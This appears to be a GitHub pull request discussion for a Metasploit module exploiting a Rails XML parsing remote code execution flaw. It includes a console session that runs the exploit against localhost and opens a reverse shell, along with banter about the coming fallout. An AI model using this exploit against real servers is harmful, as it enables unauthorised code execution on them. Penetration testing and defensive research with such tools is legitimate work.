For no reason other than to beat you to it ;)
(hdmoore claimed they were pushing their own module in a couple hours time)
Tested with ruby 1.9.3 on Rails 3.2.10. Can probably be made to work on older ruby+rails versions, particularly using Gem::Requirement restricts it to 1.9.?.
A variation of @benmmurphy's payload is used, which he may or may not be comfortable with. I figure it's not too difficult to come up with independently and my/@charliesome's hack would just be replaced by something similar eventually.
msf > use exploits/unix/webapp/rails_xml_parsing_exec
msf exploit(rails_xml_parsing_exec) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(rails_xml_parsing_exec) > exploit
[*] Started reverse double handler
[*] Sent exploit request
[*] Accepted the first client connection...
[*] Accepted the second client connection...
Rails RCE with hacky payload
Thanks! Closing this out and will merge your work into the module in progress that uses ARCH_RUBY payloads
haha this is going to be a shitshow...
See #1282 for the merged version of this module
incoming shitstorm expected :)